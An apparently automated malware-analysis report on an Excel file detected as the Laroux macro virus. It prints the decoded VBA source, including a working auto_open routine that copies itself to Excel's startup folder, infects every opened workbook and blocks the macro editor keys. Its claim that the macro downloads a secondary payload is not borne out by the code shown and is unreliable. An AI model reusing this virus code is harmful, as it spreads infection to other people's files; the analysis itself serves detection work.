Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4827dbc114043b75…

MALICIOUS

Office (OLE)

Size: 303.5 KB
Created: 2008-12-28 02:25:24
Authoring application: Microsoft Excel
First seen: 2015-09-18
MD5: 4ad4038fcafb2164efd434e7de532d39
SHA-1: 65a08cad14360a298f2cd095831de57bafdc3702
SHA-256: 4827dbc114043b7503812e652f352305f89fed23a6dba7036cc907ba7f4c80e9
Risk Score: 88

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file is an Office document containing a large VBA macro, flagged by ClamAV as Doc.Macro.Laroux-5893719-0. The presence of an Auto_Open macro suggests an attempt to automatically execute malicious code upon opening the document. The macro's likely purpose is to download and execute a secondary payload, a common technique for malware distribution.

Heuristics (3)

  • ClamAV: Doc.Macro.Laroux-5893719-0 (severity: critical; ID: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
  • VBA macros detected (severity: medium; ID: OLE_VBA_MACROS; 1 related finding)
    Document contains VBA macro code
  • Auto_Open macro (severity: low; ID: OLE_VBA_AUTO)
    Auto_Open macro
    Matched line in script: Sub auto_open()

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13004 bytes
SHA-256: 2c52b275a4db1dff160bd93d7fcdfff81f2d902ec6481e8d7c89da6b4dfb9183
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CheckBox55, 144, 23, MSForms, CheckBox"
Attribute VB_Control = "CheckBox9, 143, 24, MSForms, CheckBox"
Attribute VB_Control = "CheckBox17, 142, 25, MSForms, CheckBox"
Attribute VB_Control = "CheckBox16, 141, 26, MSForms, CheckBox"
Attribute VB_Control = "CheckBox21, 140, 27, MSForms, CheckBox"
Attribute VB_Control = "CheckBox20, 139, 28, MSForms, CheckBox"
Attribute VB_Control = "CheckBox19, 138, 29, MSForms, CheckBox"
Attribute VB_Control = "CheckBox29, 137, 30, MSForms, CheckBox"
Attribute VB_Control = "CheckBox26, 136, 31, MSForms, CheckBox"
Attribute VB_Control = "CheckBox25, 135, 32, MSForms, CheckBox"
Attribute VB_Control = "CheckBox23, 134, 33, MSForms, CheckBox"
Attribute VB_Control = "CheckBox38, 133, 34, MSForms, CheckBox"
Attribute VB_Control = "CheckBox35, 132, 35, MSForms, CheckBox"
Attribute VB_Control = "CheckBox39, 131, 36, MSForms, CheckBox"
Attribute VB_Control = "CheckBox15, 39, 37, MSForms, CheckBox"
Attribute VB_Control = "CheckBox6, 41, 39, MSForms, CheckBox"
Attribute VB_Control = "CheckBox7, 42, 40, MSForms, CheckBox"
Attribute VB_Control = "CheckBox8, 43, 41, MSForms, CheckBox"
Attribute VB_Control = "CheckBox10, 45, 43, MSForms, CheckBox"
Attribute VB_Control = "CheckBox11, 46, 44, MSForms, CheckBox"
Attribute VB_Control = "CheckBox56, 130, 45, MSForms, CheckBox"
Attribute VB_Control = "CheckBox4, 50, 48, MSForms, CheckBox"
Attribute VB_Control = "CheckBox5, 51, 49, MSForms, CheckBox"
Attribute VB_Control = "CheckBox12, 52, 50, MSForms, CheckBox"
Attribute VB_Control = "CheckBox14, 53, 51, MSForms, CheckBox"
Attribute VB_Control = "CheckBox18, 56, 54, MSForms, CheckBox"
Attribute VB_Control = "CheckBox22, 60, 58, MSForms, CheckBox"
Attribute VB_Control = "CheckBox24, 63, 61, MSForms, CheckBox"
Attribute VB_Control = "CheckBox27, 66, 64, MSForms, CheckBox"
Attribute VB_Control = "CheckBox28, 67, 65, MSForms, CheckBox"
Attribute VB_Control = "CheckBox34, 126, 66, MSForms, CheckBox"
Attribute VB_Control = "CheckBox30, 70, 68, MSForms, CheckBox"
Attribute VB_Control = "CheckBox31, 71, 69, MSForms, CheckBox"
Attribute VB_Control = "CheckBox32, 72, 70, MSForms, CheckBox"
Attribute VB_Control = "CheckBox36, 76, 74, MSForms, CheckBox"
Attribute VB_Control = "CheckBox37, 77, 75, MSForms, CheckBox"
Attribute VB_Control = "CheckBox1, 125, 76, MSForms, CheckBox"
Attribute VB_Control = "CheckBox33, 124, 77, MSForms, CheckBox"
Attribute VB_Control = "CheckBox3, 123, 78, MSForms, CheckBox"
Attribute VB_Control = "CheckBox2, 122, 81, MSForms, CheckBox"
Attribute VB_Control = "CheckBox42, 85, 83, MSForms, CheckBox"
Attribute VB_Control = "CheckBox43, 86, 84, MSForms, CheckBox"
Attribute VB_Control = "CheckBox44, 87, 85, MSForms, CheckBox"
Attribute VB_Control = "CheckBox45, 88, 86, MSForms, CheckBox"
Attribute VB_Control = "CheckBox46, 89, 87, MSForms, CheckBox"
Attribute VB_Control = "CheckBox47, 90, 88, MSForms, CheckBox"
Attribute VB_Control = "CheckBox48, 91, 89, MSForms, CheckBox"
Attribute VB_Control = "CheckBox49, 92, 90, MSForms, CheckBox"
Attribute VB_Control = "CheckBox50, 93, 91, MSForms, CheckBox"
Attribute VB_Control = "CheckBox51, 94, 92, MSForms, CheckBox"
Attribute VB_Control = "CheckBox52, 95, 93, MSForms, CheckBox"
Attribute VB_Control = "CheckBox53, 96, 94, MSForms, CheckBox"
Attribute VB_Control = "CheckBox54, 97, 95, MSForms, CheckBox"
Attribute VB_Control = "CheckBox41, 112, 96, MSForms, CheckBox"
Attribute VB_Control = "CheckBox59, 103, 101, MSForms, CheckBox"
Attribute VB_Control = "CheckBox60, 104, 102, MSForms, CheckBox"
Attribute VB_Control = "CheckBox61, 105, 103, MSForms, CheckBox"
Attribute VB_Control = "CheckBox62, 106, 104, MSForms, CheckBox"
Attribute VB_Control = "CheckBox63, 107, 105, MSForms, CheckBox"
Attribute VB_Control = "CheckBox64, 108, 106, MSForms, CheckBox"
Attribute VB_Control = "CheckBox40, 111, 107, MSForms, CheckBox"
Private Sub TextBox1_Change()

End Sub

Private Sub CheckBox1_Click()

End Sub

Private Sub CheckBox25_Click()

End Sub

Private Sub CheckBox3_Click()

End Sub

Private Sub CheckBox56_Click()

End Sub

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CheckBox3, 58, 16, MSForms, CheckBox"
Attribute VB_Control = "CheckBox2, 57, 17, MSForms, CheckBox"
Attribute VB_Control = "CheckBox1, 56, 18, MSForms, CheckBox"
Attribute VB_Control = "CheckBox4, 54, 20, MSForms, CheckBox"
Attribute VB_Control = "CheckBox39, 67, 52, MSForms, CheckBox"
Attribute VB_Control = "CheckBox38, 68, 53, MSForms, CheckBox"
Attribute VB_Control = "CheckBox9, 69, 54, MSForms, CheckBox"
Attribute VB_Control = "CheckBox8, 70, 55, MSForms, CheckBox"
Attribute VB_Control = "CheckBox7, 71, 56, MSForms, CheckBox"
Attribute VB_Control = "CheckBox6, 72, 57, MSForms, CheckBox"
Attribute VB_Control = "CheckBox5, 73, 58, MSForms, CheckBox"
Attribute VB_Control = "CheckBox10, 75, 60, MSForms, CheckBox"
Attribute VB_Control = "CheckBox12, 76, 61, MSForms, CheckBox"
Attribute VB_Control = "CheckBox32, 77, 62, MSForms, CheckBox"
Attribute VB_Control = "CheckBox31, 78, 63, MSForms, CheckBox"
Attribute VB_Control = "CheckBox30, 79, 64, MSForms, CheckBox"
Attribute VB_Control = "CheckBox29, 80, 65, MSForms, CheckBox"
Attribute VB_Control = "CheckBox28, 81, 66, MSForms, CheckBox"
Attribute VB_Control = "CheckBox40, 82, 67, MSForms, CheckBox"
Attribute VB_Control = "CheckBox27, 83, 68, MSForms, CheckBox"
Attribute VB_Control = "CheckBox36, 84, 69, MSForms, CheckBox"
Attribute VB_Control = "CheckBox35, 85, 70, MSForms, CheckBox"
Attribute VB_Control = "CheckBox34, 86, 71, MSForms, CheckBox"
Attribute VB_Control = "CheckBox33, 87, 72, MSForms, CheckBox"
Attribute VB_Control = "CheckBox11, 88, 73, MSForms, CheckBox"
Attribute VB_Control = "CheckBox13, 89, 74, MSForms, CheckBox"
Attribute VB_Control = "CheckBox14, 90, 75, MSForms, CheckBox"
Attribute VB_Control = "CheckBox15, 91, 76, MSForms, CheckBox"
Attribute VB_Control = "CheckBox16, 92, 77, MSForms, CheckBox"
Attribute VB_Control = "CheckBox17, 93, 78, MSForms, CheckBox"
Attribute VB_Control = "CheckBox18, 94, 79, MSForms, CheckBox"
Attribute VB_Control = "CheckBox19, 95, 80, MSForms, CheckBox"
Attribute VB_Control = "CheckBox20, 96, 81, MSForms, CheckBox"
Attribute VB_Control = "CheckBox21, 97, 82, MSForms, CheckBox"
Attribute VB_Control = "CheckBox22, 98, 83, MSForms, CheckBox"
Attribute VB_Control = "CheckBox23, 99, 84, MSForms, CheckBox"
Attribute VB_Control = "CheckBox24, 100, 85, MSForms, CheckBox"
Attribute VB_Control = "CheckBox25, 101, 86, MSForms, CheckBox"
Attribute VB_Control = "CheckBox26, 102, 87, MSForms, CheckBox"
Private Sub CheckBox12_Click()

End Sub

Private Sub CheckBox26_Click()

End Sub

Private Sub CheckBox33_Click()

End Sub

Attribute VB_Name = "StartUp"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
    Application.ScreenUpdating = False
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("StartUp.xls").Save
    'Workbooks(n$).Close (False)
  End If
  Application.OnSheetActivate = "StartUp.xls!ycop"
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub

Sub ycop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = False
    n$ = ActiveSheet.Name
    Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    Sheets(n$).Select
  End If
End Sub

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "CheckBox15, 2, 0, MSForms, CheckBox"
Attribute VB_Control = "CheckBox6, 3, 1, MSForms, CheckBox"
Attribute VB_Control = "CheckBox7, 4, 2, MSForms, CheckBox"
Attribute VB_Control = "CheckBox8, 5, 3, MSForms, CheckBox"
Attribute VB_Control = "CheckBox10, 6, 4, MSForms, CheckBox"
Attribute VB_Control = "CheckBox11, 7, 5, MSForms, CheckBox"
Attribute VB_Control = "CheckBox4, 8, 6, MSForms, CheckBox"
Attribute VB_Control = "CheckBox5, 9, 7, MSForms, CheckBox"
Attribute VB_Control = "CheckBox12, 10, 8, MSForms, CheckBox"
Attribute VB_Control = "CheckBox14, 11, 9, MSForms, CheckBox"
Attribute VB_Control = "CheckBox18, 12, 10, MSForms, CheckBox"
Attribute VB_Control = "CheckBox22, 13, 11, MSForms, CheckBox"
Attribute VB_Control = "CheckBox24, 14, 12, MSForms, CheckBox"
Attribute VB_Control = "CheckBox27, 15, 13, MSForms, CheckBox"
Attribute VB_Control = "CheckBox28, 16, 14, MSForms, CheckBox"
Attribute VB_Control = "CheckBox30, 17, 15, MSForms, CheckBox"
Attribute VB_Control = "CheckBox31, 18, 16, MSForms, CheckBox"
Attribute VB_Control = "CheckBox32, 19, 17, MSForms, CheckBox"
Attribute VB_Control = "CheckBox36, 20, 18, MSForms, CheckBox"
Attribute VB_Control = "CheckBox37, 21, 19, MSForms, CheckBox"
Attribute VB_Control = "CheckBox42, 22, 20, MSForms, CheckBox"
Attribute VB_Control = "CheckBox43, 23, 21, MSForms, CheckBox"
Attribute VB_Control = "CheckBox44, 24, 22, MSForms, CheckBox"
Attribute VB_Control = "CheckBox45, 25, 23, MSForms, CheckBox"
Attribute VB_Control = "CheckBox46, 26, 24, MSForms, CheckBox"
Attribute VB_Control = "CheckBox47, 27, 25, MSForms, CheckBox"
Attribute VB_Control = "CheckBox48, 28, 26, MSForms, CheckBox"
Attribute VB_Control = "CheckBox49, 29, 27, MSForms, CheckBox"
Attribute VB_Control = "CheckBox50, 30, 28, MSForms, CheckBox"
Attribute VB_Control = "CheckBox51, 31, 29, MSForms, CheckBox"
Attribute VB_Control = "CheckBox52, 32, 30, MSForms, CheckBox"
Attribute VB_Control = "CheckBox53, 33, 31, MSForms, CheckBox"
Attribute VB_Control = "CheckBox54, 34, 32, MSForms, CheckBox"
Attribute VB_Control = "CheckBox59, 35, 33, MSForms, CheckBox"
Attribute VB_Control = "CheckBox60, 36, 34, MSForms, CheckBox"
Attribute VB_Control = "CheckBox61, 37, 35, MSForms, CheckBox"
Attribute VB_Control = "CheckBox62, 38, 36, MSForms, CheckBox"
Attribute VB_Control = "CheckBox63, 39, 37, MSForms, CheckBox"
Attribute VB_Control = "CheckBox64, 40, 38, MSForms, CheckBox"
Attribute VB_Control = "CheckBox40, 41, 39, MSForms, CheckBox"
Attribute VB_Control = "CheckBox41, 42, 40, MSForms, CheckBox"
Attribute VB_Control = "CheckBox2, 43, 41, MSForms, CheckBox"
Attribute VB_Control = "CheckBox3, 44, 42, MSForms, CheckBox"
Attribute VB_Control = "CheckBox33, 45, 43, MSForms, CheckBox"
Attribute VB_Control = "CheckBox1, 46, 44, MSForms, CheckBox"
Attribute VB_Control = "CheckBox34, 47, 45, MSForms, CheckBox"
Attribute VB_Control = "CheckBox56, 48, 46, MSForms, CheckBox"
Attribute VB_Control = "CheckBox39, 49, 47, MSForms, CheckBox"
Attribute VB_Control = "CheckBox35, 50, 48, MSForms, CheckBox"
Attribute VB_Control = "CheckBox38, 51, 49, MSForms, CheckBox"
Attribute VB_Control = "CheckBox23, 52, 50, MSForms, CheckBox"
Attribute VB_Control = "CheckBox25, 53, 51, MSForms, CheckBox"
Attribute VB_Control = "CheckBox26, 54, 52, MSForms, CheckBox"
Attribute VB_Control = "CheckBox29, 55, 53, MSForms, CheckBox"
Attribute VB_Control = "CheckBox19, 56, 54, MSForms, CheckBox"
Attribute VB_Control = "CheckBox20, 57, 55, MSForms, CheckBox"
Attribute VB_Control = "CheckBox21, 58, 56, MSForms, CheckBox"
Attribute VB_Control = "CheckBox16, 59, 57, MSForms, CheckBox"
Attribute VB_Control = "CheckBox17, 60, 58, MSForms, CheckBox"
Attribute VB_Control = "CheckBox9, 61, 59, MSForms, CheckBox"
Attribute VB_Control = "CheckBox55, 62, 60, MSForms, CheckBox"
Private Sub TextBox1_Change()

End Sub

Private Sub CheckBox1_Click()

End Sub

Private Sub CheckBox25_Click()

End Sub

Private Sub CheckBox3_Click()

End Sub

Private Sub CheckBox56_Click()

End Sub